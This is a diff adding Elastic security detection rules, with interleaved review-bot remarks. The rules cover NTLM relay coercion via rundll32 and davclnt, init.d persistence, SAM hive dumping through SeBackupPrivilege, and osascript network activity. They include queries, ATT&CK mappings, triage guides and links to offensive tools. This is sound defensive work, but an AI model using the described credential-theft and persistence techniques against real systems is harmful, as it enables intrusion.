"T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + }, + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.001", + "name": "Windows File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "4630d948-40d4-4cef-ac69-4002e29bc3db_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_108.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_108.json new file mode 100644 index 00000000000..17bd4da619a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_108.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Local NTLM Relay via HTTP", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"rundll32.exe\" and\n\n /* Rundll32 WbeDav Client */\n process.args : (\"?:\\\\Windows\\\\System32\\\\davclnt.dll,DavSetCookie\", \"?:\\\\Windows\\\\SysWOW64\\\\davclnt.dll,DavSetCookie\") and\n\n /* Access to named pipe via http */\n process.args : (\"http*/print/pipe/*\", \"http*/pipe/spoolss\", \"http*/pipe/srvsvc\")\n", + "references": [ + "https://github.com/med0x2e/NTLMRelay2Self", + "https://github.com/topotam/PetitPotam", + "https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4682fd2c-cfae-47ed-a543-9bed37657aa6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + 
"tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "4682fd2c-cfae-47ed-a543-9bed37657aa6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_109.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_109.json new file mode 100644 index 00000000000..262f1e4d678 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_109.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Local NTLM Relay via HTTP", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"rundll32.exe\" and\n\n /* Rundll32 WbeDav Client */\n process.args : (\"?:\\\\Windows\\\\System32\\\\davclnt.dll,DavSetCookie\", \"?:\\\\Windows\\\\SysWOW64\\\\davclnt.dll,DavSetCookie\") and\n\n /* Access to named pipe via http */\n process.args : (\"http*/print/pipe/*\", \"http*/pipe/spoolss\", \"http*/pipe/srvsvc\")\n", + "references": [ + "https://github.com/med0x2e/NTLMRelay2Self", + "https://github.com/topotam/PetitPotam", + "https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4682fd2c-cfae-47ed-a543-9bed37657aa6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4682fd2c-cfae-47ed-a543-9bed37657aa6_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9.json new file mode 100644 index 00000000000..37422a0a311 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the \"systemd-sysv-generator\" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through init.d Detected", + "new_terms_fields": [ + "file.path", + "process.name", + "host.id" + ], + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not (\n (process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \"rpm\" or\n \"vmis-launcher\" or \"exe\" or \"platform-python\" or \"executor\" or \"podman\")) or\n (file.extension : (\"swp\" or \"swpx\")) or\n (process.name:mv and file.name:*.dpkg-remove) or\n (process.name:sed and file.name:sed*) or\n (process.name:systemd and file.name:*.dpkg-new)\n)\n", + "references": [ + "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts", + "https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "474fd20e-14cc-49c5-8160-d9ab4ba16c8b", + "setup": "## Setup\n\nThis rule requires 
data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_110.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_110.json new file mode 100644 index 00000000000..da27b5115f6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_110.json 
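Review bot: The `process.name` exclusion list in the new `query` string repeats `"rpm"` twice (`"dpkg" or "dockerd" or "rpm" or "dnf" or "chef-client" or "apk" or "yum" or "rpm" or ...`); this is harmless for KQL evaluation but indicates the list was not deduplicated, so the second occurrence should be dropped. These `security_rule` objects look like exports synced from an upstream rules repository rather than hand-edited files, so the fix presumably belongs upstream or it will be reintroduced on the next sync. In the same file's triage note, the suggested command `sudo cat /var/log/syslog | grep 'LSB'` can be written as `sudo grep 'LSB' /var/log/syslog`.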
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Remote Registry Access via SeBackupPrivilege", + "note": "## Triage and analysis\n\n### Investigating Suspicious Remote Registry Access via SeBackupPrivilege\n\nSeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of the system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of providing the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system.\n\nThis rule identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the activities done by the subject user the login session. 
The field `winlog.event_data.SubjectLogonId` can be used to get this data.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file modifications, and processes created.\n- Investigate if the registry file was retrieved or exfiltrated.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Limit or disable the involved user account to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\" and\n\n /* excluding accounts with existing privileged access */\n not winlog.event_data.PrivilegeList : \"SeDebugPrivilege\"]\n [any where event.action == \"Detailed File Share\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", + "references": [ + "https://github.com/mpgn/BackupOperatorToDA", + "https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", + "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows 
Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.004", + "name": "LSA Secrets", + "reference": "https://attack.mitre.org/techniques/T1003/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2_110", + "type": "security-rule" +} \ No newline at end of file 
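Review bot: `required_fields` declares `winlog.event_data.RelativeTargetName` with `"type": "unknown"` while the second stage of `query` filters on it with a wildcard match (`winlog.event_data.RelativeTargetName : "winreg"`), which suggests the field is not part of the mapped schema of the `system` (`^1.6.4`) and `windows` (`^1.5.0`) integrations the rule declares. If the field is only dynamically mapped, the match behaves differently on indices where `event_data` is unmapped or mapped as text, so the mapping is worth confirming against those integration versions and the type pinned to `keyword` once confirmed. Since this file mirrors an upstream prebuilt rule, the correction belongs in the source rule rather than in this package copy.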
diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_106.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_106.json new file mode 100644 index 00000000000..052a12d8585 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_106.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects execution via the Apple script interpreter (osascript) followed by a network connection from the same process within a short time period. Adversaries may use malicious scripts for execution and command and control.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Apple Script Execution followed by Network Connection", + "query": "sequence by host.id, process.entity_id with maxspan=30s\n [process where host.os.type == \"macos\" and event.type == \"start\" and process.name == \"osascript\"]\n [network where host.os.type == \"macos\" and event.type != \"end\" and process.name == \"osascript\" and destination.ip != \"::1\" and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html", + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "47f76567-d58a-4fed-b32b-21f571e28910", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.002", + "name": "AppleScript", + "reference": "https://attack.mitre.org/techniques/T1059/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "47f76567-d58a-4fed-b32b-21f571e28910_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108.json new file mode 100644 index 00000000000..b0483a7b717 
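Review bot: `destination.ip != "::1"` in the network stage of `query` is redundant, because `"::1"` is also an entry of the `cidrmatch` exclusion list; stating it once (either the comparison or the list entry) makes the intent clearer. The list covers the IPv4 special-purpose ranges from the cited IANA registry plus IPv6 link-local (`FE80::/10`) and multicast (`FF00::/8`), but not IPv6 unique-local space (`fc00::/7`), so an osascript connection to an internal IPv6 host alerts where the equivalent RFC1918 IPv4 traffic would not; if that asymmetry is unintended it is a one-entry addition to the list. This file is a copy of an upstream prebuilt rule, so any change should be made in the source rule.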
--- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_108.json 
